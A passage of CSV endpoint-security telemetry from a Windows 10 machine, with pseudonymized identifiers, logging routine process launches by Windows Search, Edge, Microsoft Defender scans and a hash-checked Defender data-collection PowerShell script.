04:34:58.875918800+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,0.0,1.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+533,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 02:08:39.549526300+00:00,3228,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320857_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320857 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:08:39.776666400+00:00,2021-06-25 02:10:57.261120600+00:00,4b6587d0-d452-4dbc-b3b7-7b7779322047,computerpii_0a470890c60768167990033d701e7bd881398861,184911,False,10.7740.19041.1052,False,11540474045144190,,11540474045178968,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+534,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:50:02.728661800+00:00,5840,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320640_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320640 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:50:03.045204600+00:00,2021-06-23 01:52:11.866328600+00:00,23463071-e39b-44ca-b818-5966d34024a4,computerpii_0a470890c60768167990033d701e7bd881398861,159163,False,10.7740.19041.1052,False,11540474045144190,,11540474045172566,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+535,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:51:48.777670300+00:00,20196,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8848 /prefetch:8",PortableExecutable,2021-06-18 23:49:38.664048500+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.54\identity_helper.exe,1080720,33098278b86f6e967f5e0f66da8192fa,dbe0ea072c1e26f07ae34f6b721074635048644ef14fce622e4097f05b6684c2,c345ea4721c3bafc8f7592f97f0407541b464904,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:51:48.838151400+00:00,2021-06-23 01:52:11.869506500+00:00,286220a8-5953-4008-adfb-7e3afafb84ac,computerpii_0a470890c60768167990033d701e7bd881398861,159222,False,10.7740.19041.1052,False,11540474045171833,,11540474045172590,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.54,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+536,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:41:19.312146+00:00,14352,MpCmdRun.exe,"""MpCmdRun.exe"" -Scan -ScanType 2 -ReturnHR",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,06291a6c019c8df6a2cdcd9bcf69e99f,e424757d661bb89804b7147fa5e4b60ec21816aed8dedba1b291c6d41bc190b4,092720f8052fbd0fd20d37fa3f16871493d13777,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 04:40:41.287204500+00:00,18808,omadmclient.exe,"omadmclient.exe /serverid ""280DE7BA-C92E-4BB4-BD1E-28942F50CF93"" /lookuptype 1 /initiator 0",True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:41:19.548230700+00:00,2021-06-23 04:43:41.855490600+00:00,bdff919b-5fef-43ed-8eec-3e9e7d8e2025,computerpii_0a470890c60768167990033d701e7bd881398861,162859,False,10.7740.19041.1052,False,11540474045173501,,11540474045173514,2021-06-23 04:40:41.287204500+00:00,18808,2021-06-23 04:40:41.287204500+00:00,\Device\HarddiskVolume3\Windows\System32\omadmclient.exe,18808,128,ActiveProcessStartkey,C:\Windows\System32,436736,2045-06-30 03:05:21+00:00,2021-06-09 01:20:50.429604200+00:00,2021-06-23 03:11:16.068415900+00:00,2021-06-09 01:20:50.418603800+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,omadmclient,omadmclient.exe,Host Process for OMA-DM Client,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+537,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:41:19.565614200+00:00,9576,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 04:41:19.312146+00:00,14352,MpCmdRun.exe,"""MpCmdRun.exe"" -Scan -ScanType 2 -ReturnHR",True,2021-06-23 04:40:41.287204500+00:00,18808,\Device\HarddiskVolume3\Windows\System32\omadmclient.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:41:19.639924300+00:00,2021-06-23 04:43:41.855580900+00:00,12bffd10-895c-4845-9e12-ca6f0a2c2a0c,computerpii_0a470890c60768167990033d701e7bd881398861,162860,False,10.7740.19041.1052,False,11540474045173514,,11540474045173515,2021-06-23 04:41:19.312146+00:00,14352,2021-06-23 04:41:19.312146+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,14352,128,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,644888,2103-08-02 08:43:42+00:00,2021-06-14 00:56:50.051000+00:00,2021-06-23 00:55:21.627906600+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+538,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:41:35.041794400+00:00,15540,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey C6288E50-61C5-D617-BD26-C59062EF6E1C ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:41:35.091691800+00:00,2021-06-23 04:43:41.856280900+00:00,c6a9a28b-3c7b-4df4-b90d-7e8de7df76dc,computerpii_0a470890c60768167990033d701e7bd881398861,162869,False,10.7740.19041.1052,False,11540474045145394,,11540474045173517,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,16512,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+539,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:42:16.214227600+00:00,19648,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""1336"" ""eyJ**********""",PortableExecutable,2021-06-09 01:20:34.273470300+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,3851040,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:42:16.223900100+00:00,2021-06-23 04:43:41.857158100+00:00,2b56bfea-c59b-4e33-82e3-c472d62607cf,computerpii_0a470890c60768167990033d701e7bd881398861,162880,False,10.7740.19041.1052,False,11540474045137006,,11540474045173521,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module
+540,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:42:26.403973200+00:00,10960,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'e2d5879f102b5df1f4ab678c7e09a07486d78462c572276efcc3d576da3fe1af')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 04:42:16.214227600+00:00,19648,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""1336"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:42:26.541711700+00:00,2021-06-23 04:43:41.857411+00:00,1b8d9f57-33d0-4073-99f1-618770adeab2,computerpii_0a470890c60768167990033d701e7bd881398861,162883,False,10.7740.19041.1052,False,11540474045173521,,11540474045173522,2021-06-23 04:42:16.214227600+00:00,19648,2021-06-23 04:42:16.214227600+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,19648,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-23 02:55:16.213537200+00:00,2021-06-09 01:20:34.273470300+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+541,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:42:26.422953100+00:00,7248,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 04:42:26.403973200+00:00,10960,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'e2d5879f102b5df1f4ab678c7e09a07486d78462c572276efcc3d576da3fe1af')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1' }""",True,2021-06-23 04:42:16.214227600+00:00,19648,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:42:26.542052700+00:00,2021-06-23 04:43:41.857496700+00:00,22a9979b-1e6f-43a5-be0c-5041351a74a3,computerpii_0a470890c60768167990033d701e7bd881398861,162884,False,10.7740.19041.1052,False,11540474045173522,,11540474045173523,2021-06-23 04:42:26.403973200+00:00,10960,2021-06-23 04:42:26.403973200+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,10960,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 02:55:26.342673700+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+542,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:42:32.521722700+00:00,11068,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\3rdmijq4.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 04:42:26.403973200+00:00,10960,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'e2d5879f102b5df1f4ab678c7e09a07486d78462c572276efcc3d576da3fe1af')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1' }""",True,2021-06-23 04:42:16.214227600+00:00,19648,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:42:32.847217700+00:00,2021-06-23 04:43:41.860254100+00:00,50dc3da9-cbf1-49da-b9bb-f23a40bdc303,computerpii_0a470890c60768167990033d701e7bd881398861,162916,False,10.7740.19041.1052,False,11540474045173522,,11540474045173524,2021-06-23 04:42:26.403973200+00:00,10960,2021-06-23 04:42:26.403973200+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,10960,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 02:55:26.342673700+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
